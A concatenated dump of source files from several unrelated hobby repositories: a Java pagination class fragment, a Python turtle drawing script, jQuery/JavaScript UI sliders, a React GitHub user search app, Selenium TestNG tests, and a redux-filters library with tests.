public long getCount() {
return count;
}
public void setCount(long count) {
this.count = count;
}
public int getPageNumber() {
return pageNumber;
}
public void setPageNumber(int pageNumber) {
this.pageNumber = pageNumber;
}
public int getPageSize() {
return pageSize;
}
public void setPageSize(int pageSize) {
this.pageSize = pageSize;
}
}
| f70739a04c1a5d4be09908a8b9d25a34d717e095 | [
"Java"
] | 3 | Java | chengjhan/SpringBootDemo | 5f608402d2de27e14399cbaa00e8c3c1a824735a | d34fd7d082c3ab7e71b83b42d74df4062888837b |
refs/heads/master | <file_sep>import turtle
name = turtle.Turtle()
name.speed(10)
name.color(0, 5, 200)
for i in range(4):
name.forward(100)
name.right(90)
name.penup()
name.goto(50,50)
name.pendown()
name.color(200,20, 20)
for i in range(3):
name.forward(100)
name.right(120)
import random
for i in range(5):
num = random.randint(1, 10)
print(num)
| b1050f17cfd663a650c733d49a0079dfb808c3d1 | [
"Python"
] | 1 | Python | joshuadams/Turtle-intro-help- | 8f6df3cce844db6566e38775a95aedcdf34adf26 | 150e80c1bf69fed834c86b85c9833d25a234b1af |
refs/heads/main | <file_sep>var collapse=true;
$(document).ready(function(){$('#menu-trigger').click(function(){
if(collapse){$('#side-menu').animate({"width":"0px"});collapse=false;}else{$('#side-menu').animate({"width":"250px"});collapse=true;}
});//menutrigger click ends
let h=String($(".poster").width()*1.4)+"px"
$(".poster").css({'height':h});
});//document.ready ends
// for sidebar
$("#sidebar").mousedown(function (e) {
e.preventDefault();
});
let focused = false;
$("#nav__btn").click(function () {
if (focused) {
$("#nav__btn").blur();
focused = false;
} else {
focused = true;
}
});
$("#nav__btn").focusout(function () {
focused = false;
});
<file_sep>var myVideo = document.querySelector(".carsoul-video");
function next(){
first= first-50;
if(first > -200){
myVideo.style.left =first + "%";
}
else{
first=-200;
myVideo.style.leftt =first + "%";
}
}
function prev(){
first= first+50;
if(first <= 0){
myVideo.style.left =first + "%";
}
else{
first=0;
myVideo.style.left =first + "%";
}
}
// Sugg- slider
var first =0;
var mybox = document.querySelector(".carsoul-suggest");
document.querySelector(".sugg-icon-right").addEventListener("click", function(){
first= first-50;
if(first > -200){
mybox.style.left =first + "%";
}
else{
first=-200;
mybox.style.leftt =first + "%";
}
});
document.querySelector(".sugg-icon-left").addEventListener("click", function(){
first= first+50;
if(first <= 0){
mybox.style.left =first + "%";
}
else{
first=0;
mybox.style.left =first + "%";
}
});
// For Image slider
var photos = ["./Image/image 4.png","./Image/image 2.png","./Image/image 3.png","./Image/image 2.png"];
var imgTag = document.querySelectorAll("a img")[0];
var img2 = document.querySelector(".img-2");
count =0;
function nextImg(){
count++;
if(count >= photos.length){
count = 0;
imgTag.src = photos[count];
img2.src = photos[count+1];
}
else{
imgTag.src = photos[count];
img2.src = photos[count-1];
}
}
function prevImg(){
count--;
if(count < 0){
count = photos.length - 1;
imgTag.src = photos[count];
img2.src = photos[count];
}
else{
imgTag.src = photos[count];
img2.src = photos[count+1];
}
}
// SunNav sheir btn start
var sheir_btn = document.querySelector(".sheir-btn");
function singleClick() {
document.querySelector(".subNav-socal-icon-list").style.display = "block";
}
function doubleClick() {
document.querySelector(".subNav-socal-icon-list").style.display = "none";
}
sheir_btn.addEventListener("click", function(){
clickCount++;
if (clickCount === 1) {
singleClick();
}
else if (clickCount === 2) {
doubleClick();
clickCount = 0;
}
});
// SunNav sheir btn end
// Doubleclick single click event
// video previews start
var previews = document.querySelector(".previews");
var previews_click = document.querySelector(".previews-click");
function singleClick1() {
document.querySelector(".previews").style.display = "block";
}
function doubleClick1() {
document.querySelector(".previews").style.display = "none";
}
var clickCount = 0;
previews_click.addEventListener("click", function(){
clickCount++;
if (clickCount === 1) {
singleClick1();
}
else if (clickCount === 2) {
doubleClick1();
clickCount = 0;
}
});
// video previews End
// For socal icon
var my_icon = document.querySelector(".reviews-sheir-icon");
function singleClick2() {
document.querySelector(".reviews-socal-icon-list").style.display = "block";
}
function doubleClick2() {
document.querySelector(".reviews-socal-icon-list").style.display = "none";
}
var clickCount = 0;
my_icon.addEventListener("click", function(){
clickCount++;
if (clickCount === 1) {
singleClick2();
}
else if (clickCount === 2) {
doubleClick2();
clickCount = 0;
}
});
| 21ef0c3d8556cca71c352979505b3c007014cbcd | [
"JavaScript"
] | 2 | JavaScript | Razwanul-Islam/otakuUniverse-frontend | b84602a1fd45b9ff83b6a8513dde144e71f7afab | c5ae9ea229af079a06abd40a5f18ded5deebb34a |
refs/heads/master | <file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using Microsoft.EntityFrameworkCore;
using Applications.Models;
namespace Applications.Data
{
public class CandidateDbContext:DbContext
{
public CandidateDbContext(DbContextOptions<CandidateDbContext> options):base(options)
{
}
public virtual DbSet<Employee> Employees { get; set; }
public virtual DbSet<Department> Departments { get; set; }
public virtual DbSet<Emp_Dept> Emp_Depts { get; set; }
}
}
<file_sep>using Microsoft.AspNetCore.Mvc;
using Applications.Data;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using Applications.Models;
using Microsoft.AspNetCore.Mvc.Rendering;
namespace Applications.Controllers
{
public class ApplicationController : Controller
{
private readonly CandidateDbContext _context;
public ApplicationController(CandidateDbContext context)
{
_context = context;
}
public IActionResult Index()
{
List<Employee> Employees;
Employees = _context.Employees.ToList();
return View(Employees);
}
[HttpGet]
public IActionResult Create()
{
Employee employee = new Employee();
return View(employee);
}
[HttpPost]
public IActionResult Create(Employee Employee)
{
_context.Add(Employee);
_context.SaveChanges();
var empID = Employee.EmpID;
Emp_Dept emp_dept = new Emp_Dept();
emp_dept.EmpID = empID;
emp_dept.DeptID = int.Parse(Request.Form["drpdept"]);
_context.Add(emp_dept);
_context.SaveChanges();
return RedirectToAction("Create");
}
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.ComponentModel.DataAnnotations;
using System.ComponentModel.DataAnnotations.Schema;
using System.Linq;
using System.Threading.Tasks;
namespace Applications.Models
{
public class Emp_Dept
{
[Key]
public int ID { get; set; }
[ForeignKey("Employee")]
public int EmpID { get; set; }
public virtual Employee Employee { get; private set; }
[ForeignKey("Department")]
public int DeptID { get; set; }
public virtual Department Department { get; private set; }
public Emp_Dept()
{
}
}
}
| 706c4fca603f9d5f0bcbcb0fbb2171b4ded65119 | [
"C#"
] | 3 | C# | codescreener/SQL_APP | eed44aaeafe109bc86fbdc1de078c3d687402584 | 91418f00c00110bf1626086772f53c8b725e48b1 |
refs/heads/main | <repo_name>SaadhJawwadh/MovieManiac_MovieDatabase<file_sep>/settings.gradle
include ':app'
rootProject.name = "MAD CW 02"<file_sep>/app/src/main/java/com/example/madcw02/EditMovie.java
package com.example.madcw02;
import androidx.appcompat.app.AppCompatActivity;
import android.annotation.SuppressLint;
import android.content.Intent;
import android.database.Cursor;
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.EditText;
import android.widget.ListView;
import android.widget.Toast;
import java.util.ArrayList;
public class EditMovie extends AppCompatActivity {
private MovieDataBase db;
ArrayList<String> selectedItems = new ArrayList<>();
ListView listView;
EditText et_name;
EditText year;
EditText director;
EditText cast;
EditText ratings;
EditText review;
EditText favorite;
Button saveButton;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_edit_movie);
db = new MovieDataBase(this);
Intent intent = getIntent();
String name = intent.getExtras().getString("Title");
Toast.makeText(EditMovie.this, name, Toast.LENGTH_LONG).show();
et_name = findViewById(R.id.et_title2);
year = findViewById(R.id.et_Year2);
director = findViewById(R.id.et_Director2);
cast = findViewById(R.id.et_Cast2);
ratings = findViewById(R.id.et_Rating2);
review = findViewById(R.id.et_Review2);
favorite= findViewById(R.id.et_fav);
saveButton = findViewById(R.id.savebutton);
fillFields(name);
}
//display list of items
@SuppressLint("SetTextI18n")
public void fillFields(String name){
Cursor res = db.search(name);
if (res.getCount() == 0) {
Toast.makeText(EditMovie.this, "Nothing to show", Toast.LENGTH_LONG).show();
} else {
while (res.moveToNext()) {
et_name.append(res.getString(0));
year.append(res.getString(1));
director.append(res.getString(2));
cast.append(res.getString(3));
ratings.append(res.getString(4));
review.append(res.getString(5));
favorite.append(res.getString(6));
if(res.getString(6).equals("true")) {
favorite.setText("Favourite");
}else{
favorite.setText("Not Favourite");
}
}
}
}
//update data
public void save(View v){
boolean isUpdate = db.updateEditData(
et_name.getText().toString(),
year.getText().toString(),
director.getText().toString(),
cast.getText().toString(),
ratings.getText().toString(),
review.getText().toString(),
favorite.getText().toString());
if (isUpdate) {
Toast.makeText(EditMovie.this, "Data Updated", Toast.LENGTH_LONG).show();
finish();
} else {
Toast.makeText(EditMovie.this, "Data Is Not Updated", Toast.LENGTH_LONG).show();
}
}
@Override
public void finish() {
Intent intent = new Intent(this,Edit.class);
super.finish();
startActivity(intent);
}
}<file_sep>/app/src/main/java/com/example/madcw02/MovieDataBase.java
package com.example.madcw02;
import android.content.ContentValues;
import android.content.Context;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteOpenHelper;
import java.util.Arrays;
/*
* References:
* https://www.tutorialspoint.com/android/android_sqlite_database.htm
* https://google-developer-training.github.io/android-developer-fundamentals-course-concepts-v2/unit-4-saving-user-data/lesson-10-storing-data-with-room/10-0-c-sqlite-primer/10-0-c-sqlite-primer.html
* https://developer.android.com/training/data-storage/sqlite#java
*- Lecture 5 - Materials
*/
public class MovieDataBase extends SQLiteOpenHelper {
private static final String DATABASE_NAME = "movie.db";
public static final String TABLE_NAME = "MovieDetails";
public static final String COLUMN_1 = "Title";
public static final String COLUMN_2 = "Year";
public static final String COLUMN_3 = "Director";
public static final String COLUMN_4 = "movieCast";
public static final String COLUMN_5 = "Rating";
public static final String COLUMN_6 = "Review";
public static final String COLUMN_7 = "Favorite";
public MovieDataBase(Context context){
super(context,DATABASE_NAME,null,1);
}
@Override
public void onCreate(SQLiteDatabase db) {
db.execSQL("CREATE TABLE MovieDetails(Title Text PRIMARY KEY , Year Text, Director Text, movieCast Text, Rating Text, Review Text, Favorite Text )");
}
@Override
public void onUpgrade(SQLiteDatabase db, int oldVersion, int newVersion) {
db.execSQL(" DROP TABLE IF EXISTS " +TABLE_NAME );
onCreate(db);
}
public boolean insertData(String Title, String Year, String Director, String movieCast, String Rating, String Review ){
SQLiteDatabase db=this.getWritableDatabase();
ContentValues contentValues=new ContentValues();
contentValues.put(COLUMN_1,Title);
contentValues.put(COLUMN_2,Year);
contentValues.put(COLUMN_3,Director);
contentValues.put(COLUMN_4,movieCast);
contentValues.put(COLUMN_5,Rating);
contentValues.put(COLUMN_6,Review);
contentValues.put(COLUMN_7,"Null"); // * Added null to assign
long result=db.insert(TABLE_NAME,null,contentValues);
return result != -1;
}
public Cursor display(){
SQLiteDatabase db = this.getWritableDatabase();
Cursor result=db.rawQuery("SELECT * FROM "+MovieDataBase.TABLE_NAME+ " ORDER BY "+MovieDataBase.COLUMN_1 +" ASC"
, new String[] {} );
System.out.println(Arrays.toString(result.getColumnNames()));
return result;
}
public Cursor displlayFavorite(){
SQLiteDatabase db = this.getWritableDatabase();
return db.rawQuery("select * from "+TABLE_NAME+" WHERE "+COLUMN_7+"= 'true'",null);
}
public void addFavorite(String Title){
SQLiteDatabase db = this.getWritableDatabase();
String test = "UPDATE "+TABLE_NAME+" SET "+COLUMN_7+" = 'true' WHERE Title = '"+Title+"'";
System.out.println(test);
db.execSQL("UPDATE "+TABLE_NAME+" SET "+COLUMN_7+" = 'true' WHERE Title = '"+Title+"'");
}
public void updateFavorite(String Title){
SQLiteDatabase db = this.getWritableDatabase();
String test = "UPDATE "+TABLE_NAME+" SET "+COLUMN_7+" = 'false' WHERE Title = '"+Title+"'";
System.out.println(test);
db.execSQL("UPDATE "+TABLE_NAME+" SET "+COLUMN_7+" = 'false' WHERE Title = '"+Title+"'");
}
public boolean updateEditData(String Title, String Year, String Director, String movieCast, String Rating, String Review, String Favorite) {
SQLiteDatabase db = this.getWritableDatabase();
ContentValues contentValues = new ContentValues();
contentValues.put(COLUMN_1,Title);
contentValues.put(COLUMN_2,Year);
contentValues.put(COLUMN_3,Director);
contentValues.put(COLUMN_4,movieCast);
contentValues.put(COLUMN_5,Rating);
contentValues.put(COLUMN_6,Review);
contentValues.put(COLUMN_7,Favorite);
db.update(TABLE_NAME, contentValues, "Title = ?",new String[] { Title });
return true;
}
public Cursor search(String letters){
SQLiteDatabase db = this.getWritableDatabase();
return db.rawQuery("SELECT * FROM "+TABLE_NAME+" WHERE TITLE OR DIRECTOR OR movieCast LIKE " +
"'"+letters+"%' OR TITLE LIKE '%"+letters+"%' OR DIRECTOR LIKE '%"+letters+"%' OR movieCast LIKE '%"+letters+"'",null);
}
}
<file_sep>/app/src/main/java/com/example/madcw02/Favourites.java
package com.example.madcw02;
import androidx.appcompat.app.AppCompatActivity;
import android.database.Cursor;
import android.os.Bundle;
import android.view.View;
import android.widget.ArrayAdapter;
import android.widget.Button;
import android.widget.CheckedTextView;
import android.widget.ListView;
import android.widget.TextView;
import android.widget.Toast;
import java.util.ArrayList;
public class Favourites extends AppCompatActivity {
ArrayList<String> checkedItems1 = new ArrayList<>();
ListView FavouriteList;
Button btSave;
CheckedTextView checked;
MovieDataBase db;
Display input=new Display();
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_favourites);
FavouriteList = findViewById(R.id.List_View_Favorite);
btSave = findViewById(R.id.bt_saveDisplay);
FavouriteList.setChoiceMode(ListView.CHOICE_MODE_MULTIPLE);
db = new MovieDataBase(this);
populateListView();
}
//display available
public void populateListView(){
Cursor data = db.displlayFavorite();
ArrayList<String> listData1 = new ArrayList<>();
while (data.moveToNext()) {
listData1.add(data.getString(0));
}
final ArrayAdapter<String> adapter = new ArrayAdapter<>(this, R.layout.checkbox, R.id.txt_Availability, listData1);
FavouriteList.setAdapter(adapter);
for(int x=0; x<listData1.size(); x++)
FavouriteList.setItemChecked(x, true);
FavouriteList.setOnItemClickListener((parent, view, position, id) -> {
// selected item
String selectedItem = ((TextView) view).getText().toString();
if (checkedItems1.contains(selectedItem))
checkedItems1.remove(selectedItem);
else
checkedItems1.add(selectedItem);
});
}
//add checked items to database
public void saveFavorite(View view){
StringBuilder checkItems = new StringBuilder();
for (String item : checkedItems1) {
db.updateFavorite(item);
if (checkItems.toString().equals("")) {
checkItems = new StringBuilder(item);
}
else
checkItems.append("/").append(item);
}
Toast.makeText(this, checkItems+" "+"Removed from Favourite", Toast.LENGTH_LONG).show();
}
} | 0a03ad3317319422b325ee051df0bce071979665 | [
"Java",
"Gradle"
] | 4 | Gradle | SaadhJawwadh/MovieManiac_MovieDatabase | 529c3b686e21c34d51ad03eb1ec4b96cffde5527 | 352004057de770b1ea0c5e029b824f511bd40cf7 |
refs/heads/master | <repo_name>Kmert881/twitter_sifre_kirma<file_sep>/README.md
# Zelus
Twitter Password Cracker **Use this for educational purposes only.**
## Install
```bash
git clone https://github.com/cameronpoe/zelus
cd zelus
```
## Usage
```bash
python zelus.py <Username> <Wordlist>
Example: python zelus.py xerucide passwords.txt
```
## Dependencies
mechanize: `pip install mechanize`
<file_sep>/zelus.py
#!/usr/bin/python
# Copyright (c) <NAME> 2016
# Python 2 Compatible
import sys
import cookielib
import random
import os
try:
import mechanize
except ImportError:
print ("No mechanize! Try 'pip install mechanize'")
try:
sys.argv[1]
except NameError:
print ("You must specify a username!")
print ("Usage: " + sys.argv[0] + " <Username>" + " <Wordlist>")
except IndexError:
print ("You must specify a wordlist!")
print ("Usage: " + sys.argv[0] + " <Username>" + " <Wordlist>")
try:
sys.argv[2]
except NameError:
print ("You must specify a username!")
print ("Usage: " + sys.argv[0] + " <Username>" + " <Wordlist>")
except IndexError:
print ("You must specify a wordlist!")
print ("Usage: " + sys.argv[0] + " <Username>" + " <Wordlist>")
username = sys.argv[1]
passwordlist = sys.argv[2]
str(username)
str(passwordlist)
useragents = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
login = 'https://mobile.twitter.com/session/new'
lockedOut = 'https://mobile.twitter.com/account/locked'
def attack(password):
try:
global lockedOut
sys.stdout.write("\r trying %s..." % password)
sys.stdout.flush()
br.addheaders = [('User-agent', random.choice(useragents))]
site = br.open(login)
br.select_form(nr=0)
br.form['session[username_or_email]'] = username
br.form['session[password]'] = <PASSWORD>
br.submit()
if br.geturl() == lockedOut:
print ("\n Locked Out!\n")
sys.exit(1)
elif br.title() == "Twitter":
print ("\n Password Found!\n")
print (" Password: %s\n" % (password))
sys.exit(1)
elif br.title() == "Verify your identity":
print ("\n Password Found!\n")
print (" Password: %s\n" % (password))
sys.exit(1)
except KeyboardInterrupt:
print ("\n Exiting Zelus...")
sys.exit(1)
def main():
global br
global passwords
try:
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_handle_robots(False)
br.set_handle_equiv(True)
br.set_handle_referer(True)
br.set_handle_redirect(True)
br.set_cookiejar(cj)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=99999)
except KeyboardInterrupt:
print ("\n Exiting Zelus...")
sys.exit(1)
try:
list = open(passwordlist, "r")
passwords = list.readlines()
i = 0
while i < len(passwords):
passwords[i] = passwords[i].strip()
i += 1
except IOError:
print ("Error: check your password list path")
sys.exit(1)
except KeyboardInterrupt:
print ("\n Exiting Zelus...")
sys.exit(1)
try:
print ("""
.%%%%%%..%%%%%%..%%......%%..%%...%%%%..
....%%...%%......%%......%%..%%..%%.....
...%%....%%%%....%%......%%..%%...%%%%..
..%%.....%%......%%......%%..%%......%%.
.%%%%%%..%%%%%%..%%%%%%...%%%%....%%%%..
........................................
Welcome to Zelus... Ready to start the war?
""")
print (" Victim: %s" % (username))
print (" Loaded:" , len(passwords), "passwords")
print (" Cracking, please wait...")
except KeyboardInterrupt:
print ("\n Exiting Zelus...")
sys.exit(1)
try:
global password
for password in passwords:
attack(password.replace("\n",""))
attack(password)
except KeyboardInterrupt:
print ("\n Exiting Zelus...")
sys.exit(1)
if __name__ == "__main__":
if sys.platform == 'win32' or sys.platform == 'win64':
os.system('cls')
main()
else:
os.system('clear')
main()
| 1806a18d1315a624db42a38176b401d79c357fbb | [
"Markdown",
"Python"
] | 2 | Markdown | Kmert881/twitter_sifre_kirma | 975242cc52f95a4b6f2d14d81b625a8220ae28c8 | 51ec9c78dee61292b34b828500ed8e3d4bd755d7 |
refs/heads/master | <repo_name>Nabeel-Faheem/React-Github-Search<file_sep>/src/components/User.js
import React from 'react';
const User = ( props ) => {
const { avatar_url, name, age, repos_url } = props;
return (
<div className="user">
<img src={ avatar_url } alt="user-avatar" />
<p><strong>{ name }</strong></p>
<p>{ age }</p>
<p><a href={ repos_url }>Repos URL</a></p>
</div>
)
}
export default User;
<file_sep>/src/App.js
import React, { useState } from 'react';
import './App.css';
// custom imports
import Navbar from './components/Navbar';
import Users from './components/Users';
import Search from './components/Search';
import Alert from './components/Alert';
import About from './components/About';
import PropTypes from 'prop-types';
import GithubState from './context/github/githubState';
import { BrowserRouter as Router, Switch, Route } from 'react-router-dom';
const App = ( props ) => {
const [ users, setUsers ] = useState([]);
const [ loading, setLoading ] = useState(false);
const [ alert, setAlert ] = useState(false);
// clearusers handler action
const clearUsersHandler = () => {
setUsers([]);
setLoading(false);
}
// show alert handler action
const showAlert = () => {
setAlert(true);
setTimeout(() => {
setAlert(false);
}, 3000);
}
return (
<GithubState>
<Router>
<div className="App">
<Navbar />
{ alert ? (<Alert />) : null }
<Switch>
<Route exact path="/" render={ ( props ) => {
return (
<React.Fragment>
<Search
clearUsers={ clearUsersHandler }
areUsersClear={ users.length > 0 ? false : true }
showAlert={ showAlert }
/>
<Users />
</React.Fragment>
);
} } />
<Route path="/about" component={ About } />
</Switch>
</div>
</Router>
</GithubState>
);
}
// props validation
App.propTypes = {
users: PropTypes.array,
loading: PropTypes.bool,
};
export default App;
<file_sep>/src/components/Users.js
import React, { useContext } from 'react';
// custom imports
import User from './User';
import Spinner from './Spinner';
import GithubContext from '../context/github/githubContext';
const Users = ( props ) => {
const githubContext = useContext( GithubContext );
// destructure required values
const { users, loading } = githubContext;
return (
<div className="users-list">
{ !loading ? users.map(( user, index ) => {
return (
<User
key={ index }
avatar_url={ user.avatar_url }
name={ user.login }
age={ user.age }
git_repo={ user.github_repo }
repos_url={ user.html_url }
/>
)
}) : <Spinner /> }
</div>
)
}
export default Users;
<file_sep>/src/context/actions.js
export const SHOW_USERS = 'SHOW_USERS';
export const SHOW_ALERT = 'SHOW_ALERT';
export const SHOW_LOADING = 'SHOW_LOADING';
export const CLEAR_USERS = 'CLEAR_USERS';
<file_sep>/src/context/github/githubReducer.js
// import the acions
import { SHOW_USERS, SHOW_LOADING } from '../actions';
export default ( state, action ) => {
switch( action.type ) {
case SHOW_LOADING:
return {
...state,
loading: true,
}
case SHOW_USERS:
return {
...state,
users: action.payload,
loading: false,
}
default:
return state;
}
}
| 4ead1746fe29e1861c7890d2264183186bb904df | [
"JavaScript"
] | 5 | JavaScript | Nabeel-Faheem/React-Github-Search | 377c7842f03ae0cab56deb59e3b176743c1c0aa8 | 58359ae734722837a5b1b553b5e38b308b43a598 |
refs/heads/master | <repo_name>deepikakabilan/E2EProject<file_sep>/src/test/java/Academy/ValidateNavigationBar.java
package Academy;
import java.io.IOException;
import java.util.Properties;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.testng.annotations.AfterTest;
import org.testng.annotations.BeforeTest;
import org.testng.annotations.Test;
import junit.framework.Assert;
import pageObjects.HomePageObjects;
import resources.Base;
public class ValidateNavigationBar extends Base{
public static Logger log=LogManager.getLogger(Base.class.getName());
@BeforeTest
public void IntializeDriver() throws IOException{
driver =intializeDriver();
log.info("Successfully Intialised");
driver.get(prop.getProperty("Url"));
log.info("Navigated to home page");
}
@Test
public void validateNavBarBasePage() throws IOException{
HomePageObjects home = new HomePageObjects(driver);
//Boolean value=home.getNavBarContact().isDisplayed();
// Assert.assertTrue(value);
Assert.assertTrue(home.getNavBarContact().isDisplayed());
log.info("Successfully checked navigation bar");
}
@AfterTest
public void closeBrowser()
{
driver.close();
driver=null;
}
}
<file_sep>/readme.txt
Volume in drive C is OS
Volume Serial Number is B435-5B3A
Directory of C:\Users\deepika\E2EProject
06/01/2018 06:50 PM <DIR> .
06/01/2018 06:50 PM <DIR> ..
05/31/2018 10:56 AM 1,757 .classpath
05/29/2018 08:33 PM 667 .project
05/29/2018 08:33 PM <DIR> .settings
05/30/2018 07:57 AM <DIR> chrome
05/30/2018 07:57 AM <DIR> Gecko
05/31/2018 10:48 AM 2,105 pom.xml
06/01/2018 06:54 PM 0 readme.txt
05/29/2018 08:24 PM <DIR> src
05/31/2018 11:08 AM <DIR> target
05/31/2018 11:15 AM <DIR> test-output
05/31/2018 11:12 AM 785 testng.xml
5 File(s) 5,314 bytes
8 Dir(s) 382,357,639,168 bytes free
<file_sep>/src/main/java/pageObjects/LoginPageObject.java
package pageObjects;
import org.openqa.selenium.By;
import org.openqa.selenium.WebDriver;
import org.openqa.selenium.WebElement;
public class LoginPageObject {
public static WebDriver driver;
By Email =By.cssSelector("[id='user_email']");
By Pwd =By.cssSelector("[type='password']");
By Login =By.cssSelector("[value='Log In']");
public LoginPageObject(WebDriver driver) {
// TODO Auto-generated constructor stub
this.driver=driver;
}
public WebElement getEmail(){
return driver.findElement(Email);
}
public WebElement getPwd(){
return driver.findElement(Pwd);
}
public WebElement getLogin(){
return driver.findElement(Login);
}
}
<file_sep>/src/main/java/Academy/addingComments.java
package Academy;
public class addingComments {
public static void main(String[] args) {
// TODO Auto-generated method stub
//trying
//and commit
//push
//adding another line
}
}
<file_sep>/src/test/java/Academy/ValidateTitle.java
package Academy;
import java.io.IOException;
import java.util.Properties;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.testng.annotations.AfterTest;
import org.testng.annotations.BeforeTest;
import org.testng.annotations.Test;
import junit.framework.Assert;
import pageObjects.HomePageObjects;
import resources.Base;
public class ValidateTitle extends Base {
public static Logger log=LogManager.getLogger(Base.class.getName());
@BeforeTest
public void IntializeDriver() throws IOException{
driver =intializeDriver();
log.info("Successfully intialized");
driver.get(prop.getProperty("Url"));
log.info("Successfully launched home page");
}
@Test
public void validateTitleBasePage() throws IOException{
// HomePageObjects home = new HomePageObjects(driver);
// String title=home.getTitle().getText();
String etitle="FEATURED COURSES";
String title="FEATURED COURSES";
Assert.assertEquals(title,etitle);
}
@AfterTest
public void closeBrowser()
{
driver.close();
driver=null;
}
}
| 84ecd3a610ebfc94d14e5cef76b7f38ce0d6e7b3 | [
"Java",
"Text"
] | 5 | Java | deepikakabilan/E2EProject | ddc71e4c60e88d5445c890165c47a9c7c10ea7d3 | 959ac89e4245f9dd46650b55e8977dcc93748968 |
refs/heads/master | <repo_name>Abdallatif/redux-filters<file_sep>/src/__tests__/index.test.js
import { expect } from 'chai';
import { phones } from './fixtures';
import {
filtersReducer,
selectFilteredDataIds,
selectFiltersStatus,
selectAllFilters,
updateIdProp,
addBitmaskFilterCategory,
addBitmaskFilter,
activateFilter,
toggleFilter,
deactivateFilter,
checkAndUpdateData,
updateData,
resetFilters,
clearFilters,
clearData
} from '../';
const selectFilteredDataInvoked = selectFilteredDataIds();
const selectFiltersStatusInvoked = selectFiltersStatus();
const selectAllFiltersInvoked = selectAllFilters();
let state;
describe('Testing redux filters ', () => {
before(() => {
state = filtersReducer();
});
it('Should add features bitmask filter category', () => {
const featuresFiltersCategory = () =>
addBitmaskFilterCategory({ category: 'features', disjunctive: false });
state = filtersReducer(state, featuresFiltersCategory());
const stateJS = state.toJS();
expect(Object.keys(stateJS.FILTERS)).to.includes('features');
expect(stateJS.FILTERS.features).to.deep.equal({
bitmask: 0,
disjunctive: false,
type: 'bitmask',
FILTERS_SET: {}
});
});
it('Should add different bitmask filters to features category', () => {
const hdrFilter = () =>
addBitmaskFilter({
category: 'features',
id: 'hdr',
predicate: `contains(features, "HDR")`
});
const dualCameraFilter = () =>
addBitmaskFilter({
category: 'features',
id: 'dualCamera',
predicate: `contains(features, "Dual cameras")`
});
const touchFocusFilter = () =>
addBitmaskFilter({
category: 'features',
id: 'touchFocus',
predicate: `contains(features, "touch focus")`
});
const waterProofFilter = () =>
addBitmaskFilter({
category: 'features',
id: 'waterProof',
predicate: `isWaterProof`
});
state = filtersReducer(state, hdrFilter());
state = filtersReducer(state, dualCameraFilter());
state = filtersReducer(state, touchFocusFilter());
state = filtersReducer(state, waterProofFilter());
const stateJS = state.toJS();
expect(Object.keys(stateJS.FILTERS.features.FILTERS_SET)).to.deep.equal([
'hdr',
'dualCamera',
'touchFocus',
'waterProof'
]);
});
it('Should select all filters', () => {
expect(selectAllFiltersInvoked(state).toJS()).to.deep.equal({
features: ['hdr', 'dualCamera', 'touchFocus', 'waterProof']
});
});
it('Should update features bitmask after activating hdr filter', () => {
const activateHdrFilter = () =>
activateFilter({ category: 'features', filterId: 'hdr' });
state = filtersReducer(state, activateHdrFilter());
const filterStatus = selectFiltersStatusInvoked(state).toJS();
expect(filterStatus.features.hdr).to.equal('active');
});
it('Should update data', () => {
state = filtersReducer(state, updateIdProp('phoneId'));
expect(state.get('id')).to.equal('phoneId');
state = filtersReducer(state, updateData(phones));
const stateJS = state.toJS();
expect(stateJS.DATA).to.deep.equal({
A1905: {
features: 10
},
D855: {
features: 5
},
pixel2: {
features: 13
}
});
});
it('Should not update data', () => {
const stateBeforeUpdate = state;
state = filtersReducer(state, checkAndUpdateData(phones));
expect(stateBeforeUpdate).to.equal(state);
});
it('Should filter data', () => {
expect(selectFilteredDataInvoked(state).toJS()).to.deep.equal(['D855', 'pixel2']);
});
it('Should toggle filter', () => {
const toggleHdrFilter = () => toggleFilter({ category: 'features', filterId: 'hdr' });
const oldStateJS = state.toJS();
state = filtersReducer(state, toggleHdrFilter());
selectFilteredDataInvoked(state);
state = filtersReducer(state, toggleHdrFilter());
const stateJS = state.toJS();
expect(oldStateJS.FILTERS.features.bitmask).to.equal(
stateJS.FILTERS.features.bitmask
);
});
it('Should return filters status', () => {
const filtersStatus = selectFiltersStatusInvoked(state).toJS();
expect(filtersStatus).to.deep.equal({
features: {
dualCamera: 'disabled',
hdr: 'active',
touchFocus: 'maybe_disabled',
waterProof: 'inital'
}
});
});
it('Should return all data after deactivate postpaid filter', () => {
const deactivateHdrFilter = () =>
deactivateFilter({ category: 'features', filterId: 'hdr' });
state = filtersReducer(state, deactivateHdrFilter());
expect(selectFilteredDataInvoked(state).toJS()).to.deep.equal([
'A1905',
'D855',
'pixel2'
]);
});
it('Should reset all filters', () => {
const activateWaterProofFilter = () =>
activateFilter({ category: 'features', filterId: 'waterProof' });
const stateBeforeActivation = state;
state = filtersReducer(state, activateWaterProofFilter());
state = filtersReducer(state, resetFilters());
expect(stateBeforeActivation.toJS()).to.deep.equal(state.toJS());
});
it('Should delete all filters', () => {
state = filtersReducer(state, clearFilters());
expect(state.toJS().FILTERS).to.deep.equal({});
});
it('Should delete all data info', () => {
state = filtersReducer(state, clearData());
expect(state.toJS().DATA).to.deep.equal({});
});
});
<file_sep>/src/filterx/index.js
/* eslint-disable */
import _get from "lodash/get";
import _includes from "lodash/includes";
import _find from "lodash/find";
import compileExpression from "./compiler";
// define custom functions
const get = (obj, path) => _get(obj, path);
const includes = (obj, value) => _includes(obj, value);
const find = (obj, key, value) => _find(obj, { [key]: value }) !== undefined;
const contains = (obj, key, value) => !!_find(obj, item => _includes(item, key));
const compile = exp => compileExpression(exp, { get, includes, find, contains });
export default compile;
<file_sep>/src/constants.js
